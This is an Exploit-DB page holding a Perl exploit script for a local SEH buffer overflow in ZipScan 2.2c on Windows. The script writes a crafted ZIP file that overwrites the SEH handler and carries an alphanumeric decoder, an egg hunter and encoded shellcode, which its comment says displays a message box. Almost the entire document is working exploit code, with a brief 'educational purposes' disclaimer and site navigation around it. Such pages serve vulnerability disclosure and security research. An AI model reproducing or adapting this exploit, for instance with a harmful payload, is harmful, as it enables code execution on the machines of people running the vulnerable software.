ZipScan 2.2c - Local Overflow (SEH)

EDB-ID:

12035

CVE:


EDB Verified:

Author:

Lincoln & corelanc0d3r

Type:

local

Exploit:   /  

Platform:

Windows

Date:

2010-04-03

Vulnerable App: 
#!/usr/bin/perl
# Software      : ZipScan 2.2c (.zip)
# Bug found by  : Lincoln
# Author        : Lincoln & corelanc0d3r
# OS            : Windows
# Tested on     : XP SP3 En (VirtualBox)
# Type of vuln  : SEH
# Greetz to     : Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
#
#
# Code :
print "|------------------------------------------------------------------|\n";
print "|                         __               __                      |\n";
print "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |\n";
print "|  / ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\   / __/ _ \\/ __ `/ __ `__ \\ |\n";
print "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |\n";
print "| \\___/\\____/_/   \\___/_/\\__,_/_/ /_/   \\__/\\___/\\__,_/_/ /_/ /_/  |\n";
print "|                                                                  |\n";
print "|                                       http://www.corelan.be:8800 |\n";
print "|                                                                  |\n";
print "|-------------------------------------------------[ EIP Hunters ]--|\n\n";
print "[+] Exploit for ZipScan 2.2c \n";



my $filename="zipscan.zip";
my $ldf_header = "\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00" .
"\x88\x13" .# file size: 5k
"\x00\x00\x00";

my $cdf_header = "\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x88\x13". # file size: 5k
"\x00\x00\x00\x00\x00\x00\x01\x00".
"\x24\x00\x00\x00\x00\x00\x00\x00";

my $eofcdf_header = "\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00".
"\xb6\x13\x00\x00". # +46
"\xa6\x13\x00\x00". # +30
"\x00\x00";

my $decoder =
#pop edx pop esp
"\x5b\x5b\x5b\x5b\x5c".

#jmp ebp
"\x25\x4A\x4D\x4E\x55".
"\x25\x35\x32\x31\x2A".
"\x2d\x55\x55\x55\x64".
"\x2d\x55\x55\x55\x64".
"\x2d\x56\x55\x56\x51".
"\x50".

#add ebp, 526h
"\x25\x4A\x4D\x4E\x55".
"\x25\x35\x32\x31\x2A".
"\x2d\x35\x69\x48\x54".
"\x2d\x25\x69\x48\x54".
"\x2d\x25\x68\x48\x52".
"\x50".

#jmp back to decoded op code
"\x7a\xb5";

#basereg ebp, modified egg hunter mov edx,ebp
#points egg hunter to unmodified shellcode
my $egg =
"UYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0".
"BBABXP8ABuJIOyJB2bPRPjs2shZmfNwLWuSj44ho".
"nXRWdpVPqdNkXznOrUZJNO45jGKOxgA";

#msg box "Exploited by Corelan Security Team"
#encoded with Alpha2 base reg edi
my $shellcode =
"w00tw00t".
"WYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0B".
"BABXP8ABuJIoy8c9JkgXYt3jTsiQYg9syQYqYbiRiW".
"9g9QYBiCsrc0CqSssssvW3aqJqzQQV8BpVPqQ4p712".
"KQQsqv1drBabbP2QRcrTprbw2RaSrpXrpTx2a72RU0".
"JCyPJrYSzpKPMrkRk59V1qtSuptQZaD75QqRnP2Rnb".
"rBbQJQVPQ3yV9pBaTPN2Ksa3Q74bPBl0KQSw6BdPLP".
"NBK3rsfqW0lrlpKBqQFQTpHBlRkpQPnbeppBn2Ksua".
"vrpWHRpBoswQxPPPuPLTsBpRy1UPQPKQq0KropH51p".
"QRPPL2kPPPlQVrd0E44pL2kCaruqWpLBlpKpPcd0Cd".
"uPPRXPCFQpKaJ0LPK2b2JpGSXPNRKw3BJW7Rpsucar".
"jpKQX53QVf7bpw9BnbKW4PtBlRkw5pQQZ0NBd410I0".
"orpDqBkppbkPLBnblpOSDPKRPQSpDqV0jaZCQrjBOq".
"T0M3wqarkSGcxPi3zPQrkPOPIrOG9ROSurKpCrlqUS".
"D3aUhrqau1Yrn0NPkpB1jsu0tRerq0JpKssqF2nBK3".
"vPlSr2K2lpKssSZPEpLPC6QSzbkPNPkW5qDRnRKqW4".
"1RmwHRosISabtcv74rgbLG5fQBj2C0Og2QT1XbfBiW".
"8sdpOpy2kQEpMv9CyrrpPbHpLpN0PRnQTpN3xRLRp2".
"rpKrxpM2lpKBoqYpoPKPO2oQiv1seG6QtpMpkF1PnS".
"yQX0MtrpQrC2lpGsu0LPD54sag2pMtxPNBKw9ROBiR".
"OPK0OPLRiqRsUQWBXG32x1RPL2pPl0EPppKpOrqPxQ".
"Ww3Suu2sv2nreVT3u4xV1REPQqspEp50D6RRmChV1p".
"LaT2D2dczBlSyaXcVQSbFpKroSsqu3v3TblCy2k0rp".
"PpPpMbKPN78rlarv0pMpMplpNpgQWpl3w2t2fVRpKs".
"hpC2NpIPoPIpoRiPoCraXPQrTqURQpQpHpEPp73PXQ".
"T4pQS77aRRnw2G5CtPq0K0kPKGHqSplSuBTaVu6pK0".
"9QXRCpE6X2p51G2PMv0shG5Pprqt8QRsiqUbPRpSdp".
"QRUbqrXQTVU1S3rrpPiPQU4PCv8savPQS2Cg5Ue3sC".
"cV1t8qRW5PBPL0PsQRp0nrbcxpQDpSaPSRp2OPPRRQ".
"UUhpCpTv1dpbp2B73W9PQPx3rpOpCQIsr2tBppeF1b".
"XSrpepQu872pPV0BLW6saQXCyRnaxBpPLbf74PEPr0".
"MCi0IBQqTt1pJprqSrBCsSSRp0QQVp2pKRo1X0PRpt".
"qpOVPPF6PbkPObqPECtsxSuRzQQ1QA";

#Filler
my $mjunk = "A" x 30;

# --- payload --- 5k total
my $junk = "A" x 22 . $egg . "A" x 3427;
my $nseh="\x7a\x06\x41\x41";
my $seh="\x16\x09\x01\x10"; #universal
my $payload = $junk.$nseh.$seh.$decoder.$shellcode.$mjunk;
$payload = $payload . ".txt";

print "[+] Size : " . length($payload)."\n";
system("del $filename");
print "[+] Creating new vulnerable file: $filename\n\n";
open(FILE, ">$filename");
print FILE $ldf_header . $payload . $cdf_header . $payload . $eofcdf_header;
close(FILE);
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services